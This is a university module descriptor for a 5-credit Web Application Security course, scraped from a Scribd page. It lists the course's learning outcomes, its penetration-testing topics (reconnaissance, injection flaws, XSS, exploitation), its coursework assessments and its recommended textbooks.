Scribd
Upload
140 views

Module Web Application Security PDF

This document provides information on the "Web Application Security" module. The 5 ECTS credit module aims to teach students how to assess a web application's security posture and demonstrate the impact of inadequate security. Students will learn about major web application flaws, exploitation techniques, and a repeatable process for finding flaws. The module covers topics like reconnaissance, vulnerability discovery, and exploitation. Assessment includes projects to perform reconnaissance and discovery/exploitation stages of a penetration test, and a final practical skills evaluation of a complete penetration test.

Uploaded by

Babak Bashari Rad
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
140 views

Module Web Application Security PDF

This document provides information on the "Web Application Security" module. The 5 ECTS credit module aims to teach students how to assess a web application's security posture and demonstrate the impact of inadequate security. Students will learn about major web application flaws, exploitation techniques, and a repeatable process for finding flaws. The module covers topics like reconnaissance, vulnerability discovery, and exploitation. Assessment includes projects to perform reconnaissance and discovery/exploitation stages of a penetration test, and a final practical skills evaluation of a complete penetration test.

Uploaded by

Babak Bashari Rad
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 3

DFCS H3021: Web

Application Security

Short Title: Web Application Security APPROVED

Full Title: Web Application Security

Module Code: DFCS H3021

ECTS credits: 5

NFQ Level: 7

Module Delivered in no programmes

Module Contributor: Mark Cummins

Module Description: Modern cyber defense requires a realistic and thorough understanding of web application security issues.
This module will enable students to capably assess a web application's security posture and convincingly
demonstrate the impact of inadequate security that plagues most organisations. Students will come to
understand major web application flaws and their exploitation and, most importantly, learn a field-tested and
repeatable process to consistently find these flaws and convey what they have learned to their
organisations.

Learning Outcomes:

On successful completion of this module the learner will be able to

1. Apply a detailed methodology to your web application penetration tests.


2. Analyse the results from automated web testing tools to remove false positives and validate findings. Manually discover
key web application flaws.
3. Analyse traffic between the client and the server application using proxy tools to find security issues within the client-side
application code.
4. Create configurations and test payloads within other web attacks

Page 1 of 3
DFCS H3021: Web
Application Security

Module Content & Assessment

Indicative Content

Overview of the web from a penetration tester's perspective


Exploring the various servers and clients. Discussion of the various web architectures. Discovering how session state works. Discussion of
the different types of vulnerabilities. Defining a web application test scope and process. Defining types of penetration testing

Reconnaissance and mapping


Discovering the infrastructure within the application. Identifying the machines and operating systems. Secure Sockets Layer (SSL)
configurations and weaknesses. Exploring virtual hosting and its impact on testing. Learning methods to identify load balancers. Software
configuration discovery. Exploring external information sources. Google hacking. Learning tools to spider a website. Scripting to automate
web requests and spidering. Application flow charting. Relationship analysis within an application. JavaScript for the attacker

Vulnerability discovery
Web app vulnerabilities and manual verification techniques. Interception proxies. Information leakage and directory browsing. Username
harvesting. Command Injection. Directory traversal. SQL injection. Blind SQL injection. Cross-Site Scripting (XSS). Cross-Site Request
Forgery (CSRF). Session flaws. Logic attacks. API attacks. Data binding attacks. Automated web application scanners

Exploitation
Exploring methods to zombify browsers. Discussing using zombies to port scan or attack internal networks. Exploring attack frameworks.
Exploiting the various vulnerabilities discoveries. Leveraging attacks to gain access to the system. How to pivot our attacks through a web
application. Exploiting applications to steal cookies. Executing commands through web application vulnerabilities

Indicative Assessment Breakdown %

Course Work Assessment % 100.00%

Course Work Assessment %

Assessment Type Assessment Description Outcome % of Assessment


addressed total Date

Project Preform reconnaissance and mapping stage of a web 1,2 25.00 Week 5
penetration test

Project Perform discovery and exploitation stage of a web penetration 3,4 25.00 Week 10
test.

Practical/Skills Perform a complete web penetration test. 1,2,3,4 50.00 Week 12


Evaluation

No Final Exam Assessment %

Indicative Reassessment Requirement

Coursework Only
This module is reassessed solely on the basis of re-submitted coursework. There is no repeat written examination.

ITB reserves the right to alter the nature and timings of assessment

Page 2 of 3
DFCS H3021: Web
Application Security

Indicative Module Workload & Resources


Indicative Workload: Full Time

Frequency Indicative Average Weekly Learner Workload

Every Week 2.00

Every Week 2.00

Every Week 3.00

Indicative Workload: Part Time

Frequency Indicative Average Weekly Learner Workload

Every Week 2.00

Every Week 2.00

Every Week 3.00

Resources

Recommended Book Resources

Dafydd Stuttard, Marcus Pinto, The Web Application Hacker's Handbook, Wiley [ISBN: 1118026470]

Michal Zalewski, The Tangled Web, No Starch Press [ISBN: 1593273886]

Supplementary Book Resources

Bryan Sullivan, Vincent Liu, Web Application Security, A Beginner's Guide, McGraw-Hill Osborne Media [ISBN: 0071776168]

This module does not have any article/paper resources

Other Resources

Website: The Open Web Application Security Project (OWASP)


https://www.owasp.org/

Page 3 of 3

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy